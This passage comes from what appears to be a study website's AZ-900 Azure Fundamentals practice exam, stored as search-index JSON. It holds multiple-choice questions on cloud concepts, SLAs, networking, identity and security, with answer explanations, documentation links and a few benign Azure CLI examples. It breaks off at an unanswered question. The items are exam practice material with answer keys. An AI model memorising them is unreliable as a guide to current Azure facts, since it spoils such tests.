        Explanation: DDoS is a type of attack that tries to exhaust application resources. The goal is to affect the application\u2019s availability and its ability to handle legitimate requests. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/ddos-protection-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-true-or-false-azure-powershell-scripts-and-command-line-interface-cli-scripts-are-entirely-compatible-with-each-other","title":"Question 28: True or false: Azure PowerShell scripts and Command Line Interface (CLI) scripts are entirely compatible with each other?","text":"
        • TRUE
        • FALSE

        Explanation: No. PowerShell is its own language, different from the CLI. For more info:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0
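
        To illustrate the incompatibility, the same query in both tools (a sketch): the CLI form runs as-is in bash, while the PowerShell equivalent is shown as a comment because it is a different language.

        ```bash
        # Azure CLI (bash): list resource group names.
        az group list --query "[].name" -o tsv

        # PowerShell equivalent (not valid bash):
        #   Get-AzResourceGroup | Select-Object -ExpandProperty ResourceGroupName
        ```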

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-for-tax-optimization-which-type-of-expense-is-preferable","title":"Question 29:\u00a0For tax optimization, which type of expense is preferable?","text":"
        • CapEx
        • OpEx

        Explanation: Operating Expenditure is thought to be preferable because you can fully deduct expenses when they are incurred. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/strategy/business-outcomes/fiscal-outcomes

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-what-is-the-recommended-way-within-azure-to-store-secrets-such-as-private-cryptographic-keys","title":"Question 30:\u00a0What is the recommended way within Azure to store secrets such as private cryptographic keys?","text":"
        • Azure Advanced Threat Protection (ATP)
        • In an Azure Storage account private blob container
        • Within the application code
        • Azure Key Vault

        Explanation: Azure Key Vault - the modern way to store cryptographic keys, signed certificates and secrets in Azure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/key-vault/
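
        A minimal sketch (vault names must be globally unique, so demo-kv-12345 is a placeholder): store a secret once, read it back at deploy time, and keep it out of application code.

        ```bash
        az keyvault create --resource-group demo-rg --name demo-kv-12345 --location eastus

        # Write and then read back a secret; the value never lives in source control.
        az keyvault secret set --vault-name demo-kv-12345 --name db-password --value 'S3cret!'
        az keyvault secret show --vault-name demo-kv-12345 --name db-password --query value -o tsv
        ```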

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-which-of-the-following-would-be-an-example-of-an-internet-of-things-iot-device","title":"Question 31:\u00a0Which of the following would be an example of an Internet of Things (IoT) device?","text":"
        • A video game, installed on Windows clients around the world, that keeps user scores in the cloud.
        • A mobile application that is used to watch online video courses
        • A refrigerator that monitors how much milk you have left and sends you a text message when you are running low
        • A web application that people use to perform their banking tasks

        Explanation: An IoT device is not a standard computing device but connects to a network to report data on a regular basis. A web server, a personal computer, or a mobile app is not an IoT device. For more info:\u00a0https://docs.microsoft.com/en-us/azure/iot-fundamentals/iot-introduction

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-deploying-azure-app-services-applications-consists-of-what-two-components-pick-two","title":"Question 32:\u00a0Deploying Azure App Services applications consists of what two components? Pick two.","text":"
        • Database scripts
        • Configuration
        • Managing operating system updates
        • Packaged code

        Explanation: Azure App Services, platform as a service, consists of code and configuration. For more info:\u00a0https://docs.microsoft.com/en-us/azure/app-service/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-what-type-of-documents-does-the-microsoft-service-trust-portal-provide","title":"Question 33:\u00a0What type of documents does the Microsoft Service Trust Portal provide?","text":"
        • Documentation on the individual Azure services and solutions
        • Specific recommendations about your usage of Azure and ways you can improve
        • A list of standards that Microsoft follows, pen test results, security assessments, white papers, faqs, and other documents that can be used to show Microsoft's compliance efforts
        • A tool that helps you manage your compliance to various standards

        Explanation: A list of standards that Microsoft follows, pen test results, security assessments, white papers, faqs, and other documents that can be used to show Microsoft's compliance efforts. For more info:\u00a0https://servicetrust.microsoft.com/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-which-of-the-following-are-one-of-the-advantages-of-running-your-cloud-in-a-private-cloud","title":"Question 34: Which of the following are one of the advantages of running your cloud in a private cloud?","text":"
        • Assurance that your code, data and applications are running on isolated hardware, and on an isolated network.
        • You own the hardware, so you can change private cloud hosting providers easily.
        • Private cloud is significantly cheaper than the public cloud.

        Explanation: Private cloud generally means that you are running your code on isolated computing, not mixed in with other companies. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-are-private-public-hybrid-clouds/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-what-advantage-does-an-application-gateway-have-over-a-load-balancer","title":"Question 35:\u00a0What advantage does an Application Gateway have over a Load Balancer?","text":"
        • Application Gateway is more like an enterprise-grade product. You should not use a load balancer in production.
        • Application gateway understands the HTTP protocol and can interpret the URL and make decisions based on the URL.
        • Application Gateway can be scaled so that two, three or more instances of the gateway can support your application.

        Explanation: Application gateway can make load balancing decisions based on the URL path, while a load balancer can't. For more info:\u00a0https://docs.microsoft.com/en-us/azure/application-gateway/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-if-you-wanted-to-get-an-alert-every-time-a-new-virtual-machine-is-created-where-could-you-create-that","title":"Question 36:\u00a0If you wanted to get an alert every time a new virtual machine is created, where could you create that?","text":"
        • Azure Monitor
        • Azure Policy
        • Subscription settings
        • Azure Dashboard

        Explanation: The best place to track events at the resource level is Azure Monitor. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/
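
        As a hedged sketch (resource and action-group names are placeholders), an activity log alert in Azure Monitor that fires whenever a virtual machine write operation, i.e. a create or update, succeeds:

        ```bash
        az monitor activity-log alert create \
          --resource-group demo-rg \
          --name vm-created-alert \
          --condition category=Administrative and operationName=Microsoft.Compute/virtualMachines/write \
          --action-group "/subscriptions/<subscription-id>/resourceGroups/demo-rg/providers/microsoft.insights/actionGroups/demo-ag"
        ```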

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-how-many-minutes-per-month-downtime-is-9999-availability","title":"Question 37:\u00a0How many minutes per month downtime is 99.99% availability?","text":"
        • 4
        • 1
        • 40
        • 100

        Explanation: 99.99% availability allows roughly 4 minutes of downtime per month: a 30-day month has 43,200 minutes, and 43,200 x 0.0001 = 4.32 minutes. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/summary/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-what-is-the-service-level-agreement-for-two-or-more-azure-virtual-machines-that-have-been-placed-into-the-same-availability-set-in-the-same-region","title":"Question 38:\u00a0What is the service level agreement for two or more Azure Virtual Machines that have been placed into the same Availability Set in the same region?","text":"
        • 100%
        • 99.90%
        • 99.99%
        • 99.95%

        Explanation: 99.95%. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-what-is-the-core-problem-that-you-need-to-solve-in-order-to-have-a-high-availability-application","title":"Question 39:\u00a0What is the core problem that you need to solve in order to have a high-availability application?","text":"
        • You need to avoid single points of failure
        • You need to ensure your server has a lot of RAM and a lot of CPUs
        • You should have a backup copy of your application on standby, ready to be started up when the main application fails.
        • You need to ensure the capacity of your server exceeds your highest number of expected concurrent users

        Explanation: You'll want to avoid single points of failure, so that any component that fails does not cause the entire application to fail. For more info:\u00a0https://docs.microsoft.com/en-us/azure/architecture/guide/design-principles/redundancy

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-are-resource-groups","title":"Question 40:\u00a0What are resource groups?","text":"
        • A folder structure in Azure in which you organize resources like databases, virtual machines, virtual networks, or almost any resource
        • Automatically assigned groups of resources that all have the same type (virtual machine, app service, etc)
        • Based on the tag assigned to a resource by the deployment script, it is assigned to a group
        • Within Azure security model, users are organized into groups, and those groups are granted permissions to resources

        Explanation: Resource Groups - a folder structure in Azure in which you organize resources like databases, virtual machines, virtual networks, or almost any resource. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-portal

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-which-of-the-following-services-would-not-be-considered-infrastructure-as-a-service","title":"Question 41:\u00a0Which of the following services would NOT be considered Infrastructure as a Service?","text":"
        • Virtual Network Interface Card (NIC)
        • Azure Functions App
        • Virtual Machine
        • Virtual Network

        Explanation: Functions are small pieces of code that you give to Azure to run for you, and you have no access to the underlying infrastructure. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-functions/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-what-two-advantages-does-cloud-computing-elasticity-give-to-you-pick-two","title":"Question 42:\u00a0What two advantages does cloud computing elasticity give to you? Pick two.","text":"
        • You can do more regular backups and you won't lose as much when that backup gets restored
        • You can save money.
        • Servers have become a commodity and Microsoft doesn't even need to fix servers that fail within Azure.
        • You can serve users better during peak traffic periods by automatically adding more capacity.

        Explanation: Elasticity saves you money during slow periods (over night, over the weekend, over the summer, etc) and also allows you to handle the highest peak of traffic. For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-elastic-computing/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-which-of-the-following-elements-is-considered-part-of-the-network-layer-of-network-security","title":"Question 43:\u00a0Which of the following elements is considered part of the \"network\" layer of network security?","text":"
        • Keeping operating systems up to date with patches
        • All of the above
        • Locks on the data center doors
        • Separate servers into distinct subnets by role

        Explanation: Separating servers into subnets is part of the network layer of security. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/network-best-practices and https://en.wikipedia.org/wiki/OSI_model

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-what-data-format-are-arm-templates-created-in","title":"Question 44:\u00a0What data format are ARM templates created in?","text":"
        • JSON
        • YAML
        • HTML
        • XML

        Explanation: ARM templates are created in JSON. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview
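
        A sketch of a minimal but valid template: write the JSON to disk and hand it to ARM (an empty resources array deploys nothing, but exercises the format end to end; the resource group name is a placeholder).

        ```bash
        cat > azuredeploy.json <<'EOF'
        {
          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
          "contentVersion": "1.0.0.0",
          "resources": []
        }
        EOF

        az deployment group create --resource-group demo-rg --template-file azuredeploy.json
        ```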

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-does-the-letter-r-in-rbac-stand-for","title":"Question 45:\u00a0What does the letter R in RBAC stand for?","text":"
        • Rights
        • Review
        • Role
        • Rule

        Explanation: RBAC is role based access control. For more info:\u00a0https://docs.microsoft.com/en-us/azure/role-based-access-control/
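
        A short sketch (the principal and scope are hypothetical): grant the built-in Reader role at the scope of a single resource group, i.e. a role assigned to an identity at a scope.

        ```bash
        az role assignment create \
          --assignee someone@example.com \
          --role Reader \
          --scope "/subscriptions/<subscription-id>/resourceGroups/demo-rg"
        ```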

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-which-azure-service-when-enabled-will-automatically-block-traffic-to-or-from-known-malicious-ip-addresses-and-domains","title":"Question 46:\u00a0Which Azure service, when enabled, will automatically block traffic to or from known malicious IP addresses and domains?","text":"
        • Network Security Groups
        • Azure Active Directory
        • Azure Firewall
        • Load Balancer

        Explanation: Azure Firewall has a threat-intelligence option that will automatically block traffic to/from bad actors on the Internet. For more info:\u00a0https://docs.microsoft.com/en-us/azure/firewall/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-true-or-false-azure-tenant-is-a-dedicated-and-trusted-instance-of-azure-active-directory-thats-automatically-created-when-your-organization-signs-up-for-a-microsoft-cloud-service-subscription","title":"Question 47:\u00a0TRUE OR FALSE: Azure Tenant is a dedicated and trusted instance of Azure Active Directory that's automatically created when your organization signs up for a Microsoft cloud service subscription.","text":"
        • TRUE
        • FALSE

        Explanation: Yes, Azure Tenant is a dedicated and trusted instance of Azure AD that's automatically created when your organization signs up for a Microsoft cloud service subscription. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-why-should-you-divide-your-application-into-multiple-subnets-as-opposed-to-having-all-your-web-application-and-database-servers-running-on-the-same-subnet","title":"Question 48:\u00a0Why should you divide your application into multiple subnets as opposed to having all your web, application and database servers running on the same subnet?","text":"
        • Each server type of your application requires its own subnet. It's not possible to mix web servers, database servers and application servers on the same subnet.
        • Separating your application into multiple subnets allows you to have different NSG security rules for each subnet, which can make it harder for a hacker to get from one compromised server onto another.
        • There are only a limited number of IP addresses available per subnet, so you need multiple subnets over a certain number.

        Explanation: For security purposes, you should not allow \"port 80\" web traffic to reach certain servers, and you do that by having separate NSG rules on each subnet. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/network-best-practices

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-style-of-computing-is-easiest-when-migrating-an-existing-hosted-application-from-your-own-data-center-into-the-cloud","title":"Question 49:\u00a0Which style of computing is easiest when migrating an existing hosted application from your own data center into the cloud?","text":"
        • PaaS
        • IaaS
        • FaaS
        • Serverless

        Explanation: Infrastructure as a Service is the easiest model to migrate an existing hosted app into: a straightforward "lift and shift". For more info:\u00a0https://azure.microsoft.com/en-us/overview/what-is-iaas/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-if-you-have-an-azure-free-account-with-a-200-credit-for-the-first-month-what-happens-when-you-reach-the-200-limit","title":"Question 50:\u00a0If you have an Azure free account, with a $200 credit for the first month, what happens when you reach the $200 limit?","text":"
        • Your account is automatically closed.
        • Your credit card is automatically billed.
        • All services are stopped and you must decide whether you want to convert to a paid account or not.
        • You cannot create any more resources until you add more credits to the account.

        Explanation: Using up the free credits causes all your resources to be stopped until you decide to get a paid account. For more info:\u00a0https://azure.microsoft.com/en-us/free/free-account-faq/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-4","title":"Test 4","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-all-resources-in-a-vnet-can-communicate-outbound-to-the-internet-by-default","title":"Question 1:\u00a0All resources in a VNet can communicate outbound to the internet, by default.","text":"
        • No
        • Yes

        Azure Virtual Network (VNet)\u00a0is the fundamental building block for your private network in Azure. VNet enables many types of Azure resources, such as Azure Virtual Machines (VM), to securely communicate with each other, the internet, and on-premises networks. VNet is similar to a traditional network that you'd operate in your own data center, but brings with it additional benefits of Azure's infrastructure such as scale, availability, and isolation. All resources in a VNet can communicate outbound to the internet, by default. You can communicate inbound to a resource by assigning a public IP address or a public Load Balancer. You can also use public IP or public Load Balancer to manage your outbound connections. To learn more about outbound connections in Azure, see\u00a0Outbound connections,\u00a0Public IP addresses, and\u00a0Load Balancer
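
        A minimal sketch with placeholder names: a VM dropped into this subnet can reach the internet outbound immediately, but nothing can reach it inbound until a public IP or load balancer is attached.

        ```bash
        az network vnet create \
          --resource-group demo-rg \
          --name demo-vnet \
          --address-prefix 10.0.0.0/16 \
          --subnet-name default \
          --subnet-prefix 10.0.0.0/24
        ```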

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-is-it-possible-for-you-to-run-both-bash-and-powershell-based-scripts-from-the-azure-cloud-shell","title":"Question 2:\u00a0Is it possible for you to run BOTH\u00a0Bash and Powershell based scripts from the Azure Cloud shell?","text":"
        • Yes
        • No

        Azure Cloud Shell is an interactive, authenticated, browser-accessible shell for managing Azure resources. It provides the flexibility of choosing the shell experience that best suits the way you work,\u00a0either Bash or PowerShell.
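
        A small sketch of that flexibility: from the Bash experience in Cloud Shell, PowerShell (pwsh, with the Az module preinstalled) is also available, so both kinds of scripts can run in one session.

        ```bash
        # Bash + Azure CLI:
        az account show --query name -o tsv

        # PowerShell one-liner invoked from bash:
        pwsh -Command 'Get-AzSubscription | Select-Object -First 1 Name'
        ```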

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-as-the-cloud-admin-of-your-organization-you-want-to-block-your-employees-from-accessing-your-apps-from-specific-locations-which-of-the-following-can-help-you-achieve-this","title":"Question 3:\u00a0As the Cloud Admin of your organization, you want to Block your employees from accessing your apps from specific locations. Which of the following can help you achieve this?","text":"
        • Azure Active Directory Conditional Access
        • Azure Sentinel
        • Azure Single Sign On (SSO)
        • Azure Role Based Access Control (RBAC)

        The modern security perimeter now extends beyond an organization's network to include user and device identity. Organizations can use identity-driven signals as part of their access control decisions. Conditional Access brings signals together to make decisions and enforce organizational policies. Azure AD Conditional Access is at the heart of the new identity-driven control plane. Conditional Access policies at their simplest are if-then statements: if a user wants to access a resource, then they must complete an action. Example: a payroll manager wants to access the payroll application and is required to do multi-factor authentication to access it.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-is-the-primary-purpose-of-external-identities-in-azure-active-directory","title":"Question 4:\u00a0What is the primary purpose of external identities in Azure Active Directory?","text":"
        • To enable single sign-on between Azure subscriptions.
        • To manage user identities exclusively for on-premises applications.
        • To allow external partners and customers to access resources in your Azure environment
        • To provide secure access to Azure resources for employees within the organization.

        External identities in Azure AD enable organizations to extend their identity management beyond their own employees. This allows external partners, vendors, and customers to access specific resources within the organization's Azure environment without requiring them to have internal accounts. Reference:\u00a0https://learn.microsoft.com/en-us/azure/active-directory/external-identities/external-identities-overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-your-startup-plans-to-migrate-to-azure-soon-but-for-all-the-resources-you-would-like-control-of-the-underlying-operating-system-and-middleware-which-of-the-following-cloud-models-would-make-the-most-sense","title":"Question 5:\u00a0Your startup plans to migrate to Azure soon, but for all the resources, you would like control of the underlying Operating System and Middleware. Which of the following cloud models would make the most sense?","text":"
        • Infrastructure as a Service (IaaS)
        • Anything as a Service (XaaS)
        • Platform as a Service (PaaS)
        • Software as a Service (SaaS)

        Infrastructure as a service (IaaS)\u00a0is a type of cloud computing service that offers essential compute, storage, and networking resources on demand, on a pay-as-you-go basis. IaaS is one of the four types of cloud services, along with software as a service (SaaS), platform as a service (PaaS), and\u00a0serverless. Migrating your organization's infrastructure to an IaaS solution helps you reduce maintenance of on-premises data centers, save money on hardware costs, and gain real-time business insights. IaaS solutions give you the flexibility to scale your IT resources up and down with demand. They also help you quickly provision new applications and increase the reliability of your underlying infrastructure. IaaS lets you bypass the cost and complexity of buying and managing physical servers and datacenter infrastructure. Each resource is offered as a separate service component, and you only pay for a particular resource for as long as you need it. A\u00a0cloud computing service provider\u00a0like\u00a0Azure\u00a0manages the infrastructure, while you purchase, install, configure, and manage your own software\u2014including operating systems, middleware, and applications.
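
        As an illustration, a hedged sketch of the IaaS model with the Azure CLI (demo-rg and demo-vm are assumed names): Azure provisions the VM, while the operating system and everything above it stays under your control:

        ```bash
        # IaaS: Azure provides the VM; you own the OS, middleware, and apps on it.
        az vm create --resource-group demo-rg --name demo-vm \
          --image Ubuntu2204 --admin-username azureuser --generate-ssh-keys

        # From here on, patching and configuring the OS is your responsibility,
        # e.g. by SSH-ing in and installing middleware yourself.
        ```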

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-your-company-has-decided-to-migrate-its-on-premises-virtual-machines-to-azure-which-azure-virtual-machines-feature-allows-you-to-migrate-virtual-machines-without-downtime","title":"Question 6:\u00a0Your company has decided to migrate its on-premises virtual machines to Azure. Which Azure Virtual Machines feature allows you to migrate virtual machines without downtime?","text":"
        • Azure Virtual Machine Scale Sets
        • Azure Site Recovery
        • Azure Spot Virtual Machines
        • Azure Reserved Virtual Machines

        The correct answer is Azure Site Recovery. Azure Site Recovery (ASR)\u00a0is a service offered by Azure that enables replication of virtual machines from on-premises environments to Azure or between Azure regions with little or no downtime. This allows for the migration of virtual machines to Azure without any disruption to business operations. After replication to Azure, the virtual machines can be launched and used as if they were in the on-premises environment.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-youve-been-planning-to-decommission-your-on-prem-database-hosting-gigabytes-of-data-which-of-the-following-is-true-about-data-ingress-moving-into-for-azure","title":"Question 7:\u00a0You've been planning to decommission your On-Prem database hosting Gigabytes of data. Which of the following is True about data ingress (moving into) for Azure?","text":"
        • It is free of cost
        • It is charged $0.05 per GB
        • It is charged $0.05 per TB
        • It is charged per hour of data transferred

        Bandwidth refers to data moving in and out of Azure data centres, as well as data moving between Azure data centres; other transfers are explicitly covered by the Content Delivery Network, ExpressRoute pricing or Peering. Data ingress (data moving into Azure) is free of cost; only outbound data transfer beyond the monthly allowance is billed.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-which-of-the-following-is-a-cloud-security-posture-management-cspm-and-cloud-workload-protection-platform-cwpp-for-all-of-your-azure-on-premises-and-multicloud-amazon-aws-and-google-gcp-resources","title":"Question 8: Which of the following is a Cloud Security Posture Management (CSPM) and Cloud Workload Protection Platform (CWPP) for all of your Azure, On-Premises, AND Multicloud (Amazon AWS and Google GCP) resources?","text":"
        • Microsoft Defender for Cloud
        • Azure DDoS Protection
        • Azure Front Door
        • Azure Key Vault
        • Azure Sentinel

        Microsoft Defender for Cloud is a Cloud Security Posture Management (CSPM) and Cloud Workload Protection Platform (CWPP) for all of your Azure, on-premises, and multicloud (Amazon AWS and Google GCP) resources. Defender for Cloud fills three vital needs as you manage the security of your resources and workloads in the cloud and on-premises:

        • Defender for Cloud secure score continually assesses your security posture so you can track new security opportunities and precisely report on the progress of your security efforts.
        • Defender for Cloud recommendations secures your workloads with step-by-step actions that protect your workloads from known security risks.
        • Defender for Cloud alerts defends your workloads in real-time so you can react immediately and prevent security events from developing.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-which-of-the-following-is-a-key-benefit-of-using-role-based-access-control-rbac-over-traditional-access-control-methods","title":"Question 9:\u00a0Which of the following is a key benefit of using Role-Based Access Control (RBAC) over traditional access control methods?","text":"
        • RBAC supports a wider range of authentication protocols than traditional methods.
        • RBAC provides centralized management of user identities and access.
        • RBAC allows you to assign permissions to specific roles rather than individual users.
        • RBAC provides stronger encryption for sensitive data.

        Role-Based Access Control (RBAC)\u00a0is an approach to access control that allows you to manage user access based on the roles they perform within an organization. With RBAC, you can define a set of roles, each with a specific set of permissions, and then assign users to those roles.

        One of the key benefits of RBAC over traditional access control methods is that it allows you to assign permissions to specific\u00a0roles\u00a0rather than individual users. This means that when a user's role changes, their permissions can be automatically adjusted without the need for manual updates. This can help to streamline the process of managing access control and reduce the risk of errors or oversights.
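
        A small sketch of role-based assignment with the Azure CLI (assumed group ID and resource group): permissions attach to a role at a scope, not to each user one by one:

        ```bash
        # Grant the built-in Reader role to an (assumed) Azure AD group at
        # resource-group scope; membership changes then adjust effective
        # permissions automatically, with no per-user updates.
        az role assignment create --assignee "<group-object-id>" \
          --role "Reader" \
          --resource-group demo-rg
        ```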

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-which-of-the-following-provides-support-for-key-migration-workloads-like-windows-sql-and-linux-server-databases-data-web-apps-and-virtual-desktops","title":"Question 10:\u00a0Which of the following provides support for key migration workloads like Windows, SQL and Linux Server, databases, data, web apps, and virtual desktops?","text":"
        • Azure Suggestions
        • Azure Recommendations
        • Azure Advisor
        • Azure Migrate

        Azure Migrate\u00a0provides all the Azure migration tools and guidance you need to plan and implement your move to the cloud\u2014and track your progress using a central dashboard that provides intelligent insights. Use a\u00a0comprehensive approach\u00a0to migrating your application and datacenter estate. Get support for key migration workloads like\u00a0Windows,\u00a0SQL\u00a0and\u00a0Linux Server, databases, data,\u00a0web apps, and virtual desktops. Migrate to destinations including Azure Virtual Machines, Azure VMware Solution, Azure App Service, and Azure SQL Database. Migrations are holistic across VMware, Hyper-V, physical server, and cloud-to-cloud migration.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-which-type-of-scaling-focuses-on-adjusting-the-capabilities-of-resources-such-as-increasing-processing-power","title":"Question 11: Which type of scaling focuses on adjusting the capabilities of resources, such as increasing processing power?","text":"
        • Static scaling
        • Vertical scaling
        • Elastic scaling
        • Horizontal scaling

        Vertical scaling involves adjusting the capabilities of resources, such as adding more CPUs or RAM to a virtual machine. It focuses on enhancing the capacity of individual resources. With horizontal scaling, by contrast, if you suddenly experienced a steep jump in demand, you could add additional virtual machines or containers, either automatically or manually (scaling out). In the same manner, if there was a significant drop in demand, deployed resources could be removed (scaling in).

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-what-is-the-default-action-for-a-network-security-rule-nsg-rule-if-no-other-action-is-specified","title":"Question 12:\u00a0 What is the default action for a Network Security Rule (NSG) rule if no other action is specified?","text":"
        • Allow
        • Block
        • Deny

        The default action for an NSG rule if no other action is specified is\u00a0DENY.
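
        Because anything not explicitly allowed falls through to the default deny, inbound access has to be opened rule by rule. A sketch with assumed names (demo-rg, web-nsg) and an example on-premises range:

        ```bash
        # Create an NSG; traffic that matches no rule hits the default deny.
        az network nsg create --resource-group demo-rg --name web-nsg

        # Explicitly allow HTTPS from an (assumed) on-premises range; lower
        # priority numbers are evaluated first.
        az network nsg rule create --resource-group demo-rg --nsg-name web-nsg \
          --name AllowHttpsFromOnPrem --priority 100 --direction Inbound --access Allow \
          --protocol Tcp --source-address-prefixes 203.0.113.0/24 --destination-port-ranges 443
        ```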

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-what-is-the-primary-purpose-of-a-public-endpoint-in-azure","title":"Question 13:\u00a0What is the primary purpose of a public endpoint in Azure?","text":"
        • To prevent communication between virtual networks.
        • To enforce access control policies for resource groups.
        • To restrict incoming network traffic to specific IP ranges.
        • To provide a direct and secure connection to Azure services.

        A\u00a0public\u00a0endpoint in Azure allows resources to be accessed over the public internet. It's used to expose services to clients or users who are not within the same network as the resource. Public endpoints are commonly used for services that need to be accessed from anywhere, such as web applications.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-what-is-the-minimum-azure-ad-edition-required-to-enable-self-service-password-reset-for-users","title":"Question 14:\u00a0What is the minimum Azure AD edition required to enable self-service password reset for users?","text":"
        • Premium P2 edition
        • Premium P1 edition
        • Basic edition
        • Free edition

        The correct answer is - Premium P1 edition is the minimum required edition to enable self-service password reset for users in Azure AD. Reference: https://azure.microsoft.com/en-us/pricing/details/active-directory/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-an-_____-is-a-collection-of-policy-definitions-that-are-grouped-together-towards-a-specific-goal-or-purpose-in-mind","title":"Question 15: An\u00a0 _____\u00a0 is a collection of policy definitions that are grouped together towards a specific goal or purpose in mind.","text":"
        • Azure Collection
        • Azure Initiative
        • Azure Group
        • Azure Bundle

        An\u00a0Azure initiative\u00a0is a collection of Azure policy definitions that are grouped together towards a specific goal or purpose in mind. Azure initiatives simplify management of your policies by grouping a set of policies together as one single item. For example, you could use the PCI-DSS built-in initiative which has all the policy definitions that are centered around meeting PCI-DSS compliance. Similar to Azure Policy, initiatives have\u00a0definitions\u00a0( a bunch of policies ) , assignments and parameters. Once you determine the definitions that you want, you would assign the initiative to a scope so that it can be applied.
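
        A rough sketch of defining and assigning an initiative with the Azure CLI; the names and the policy definition ID are placeholders, not real built-in definitions:

        ```bash
        # Group existing policy definitions into one initiative (placeholder ID).
        az policy set-definition create --name corp-baseline \
          --display-name "Corporate baseline" \
          --definitions '[{"policyDefinitionId": "/providers/Microsoft.Authorization/policyDefinitions/<definition-guid>"}]'

        # Assign the initiative to a scope, e.g. a resource group.
        az policy assignment create --name corp-baseline-assignment \
          --policy-set-definition corp-baseline --resource-group demo-rg
        ```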

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-which-service-would-you-use-to-reduce-the-overhead-of-manually-assigning-permissions-to-a-set-of-resources","title":"Question 16:\u00a0Which service would you use to reduce the overhead of manually assigning permissions to a set of resources?","text":"
        • Azure Resource Manager
        • Azure Trust Center
        • Azure Policy
        • Azure Logic Apps

        Azure Resource Manager\u00a0is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in your Azure account. You use management features, like access control, locks, and tags, to secure and organize your resources after deployment.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-which-of-the-following-authentication-protocols-is-not-supported-by-azure-ad","title":"Question 17:\u00a0Which of the following authentication protocols is not supported by Azure AD?","text":"
        • OpenID Connect
        • NTLM
        • OAuth 2.0
        • SAML

